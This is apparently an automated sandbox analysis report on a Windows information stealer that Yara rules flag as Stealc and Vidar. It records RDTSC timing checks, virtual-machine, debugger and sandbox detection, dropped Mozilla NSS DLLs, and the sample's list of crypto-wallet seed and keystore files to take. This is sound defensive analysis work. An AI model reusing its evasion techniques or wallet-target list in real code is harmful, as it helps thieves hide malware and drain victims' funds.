Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA47B3 second address: BA47F2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F23947D0396h 0x00000008 jno 00007F23947D0392h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F23947D038Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA493E second address: BA4942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA5497 second address: BA54AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F23947D038Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA54AA second address: BA54C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23952C8E38h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA6E3F second address: BA6E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F23947D038Eh 0x00000008 jmp 00007F23947D038Ch 0x0000000d je 00007F23947D0386h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F23947D0394h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA6E7B second address: BA6E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA18E second address: BAA192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA192 second address: BAA1B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F23952C8E26h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jne 00007F23952C8E26h 0x00000013 jmp 00007F23952C8E2Ch 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA1B2 second address: BAA1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F23947D038Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAA1C2 second address: BAA1CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F23952C8E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC3D0 second address: BAC3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BABFC3 second address: BABFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F23952C8E26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F23952C8E36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BABFE8 second address: BABFEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB8EF4 second address: BB8EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBB6EA second address: BBB704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947D0395h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBB704 second address: BBB70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBB70C second address: BBB710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBB710 second address: BBB714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC00E3 second address: BC0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947D0390h 0x00000009 jg 00007F23947D0388h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC0105 second address: BC0109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BC0109 second address: BC010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD6FE second address: BCD708 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F23952C8E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD708 second address: BCD726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F23947D0395h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD726 second address: BCD73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jbe 00007F23952C8E26h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD73C second address: BCD742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD438 second address: BCD43E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BCD43E second address: BCD442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDCFA9 second address: BDCFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F23952C8E30h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDCFBF second address: BDCFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jg 00007F23947D0386h 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F23947D0386h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnp 00007F23947D0386h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFE50 second address: BDFE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFEC0 second address: BDFEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDFEC4 second address: BDFEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23952C8E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE30F8 second address: BE3102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3102 second address: BE3118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F23955E2766h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F23955E2766h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3118 second address: BE3136 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F23955E58D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F23955E58E2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3136 second address: BE3163 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F23955E2766h 0x00000008 jne 00007F23955E2766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F23955E2775h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F23955E2766h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE3163 second address: BE3167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230307 second address: 523030D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523030D second address: 523031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23955E58DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523031E second address: 5230322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF59 second address: AFDF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF5D second address: AFDF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF61 second address: AFDF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDF6F second address: AFDF79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23955E276Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9517D7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B803A7 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 10.0 %
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00704910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_006FDA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_006FE430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_006FBE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006F16D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00703EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006FF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007038B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00704570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_006FED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006FDE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F1160 GetSystemInfo,ExitProcess, 0_2_006F1160
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.1964134171.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1964134171.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C635FF0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_006F45C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00709860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709750 mov eax, dword ptr fs:[00000030h] 0_2_00709750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00707850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C60B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C60B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00709600
Source: file.exe, file.exe, 00000000.00000002.1964134171.0000000000AD1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: tProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B341 cpuid 0_2_6C60B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00707B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00706920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00706920
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00707850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00707A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00707A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1686260675.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6868, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
Source: file.exe String found in binary or memory: Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__
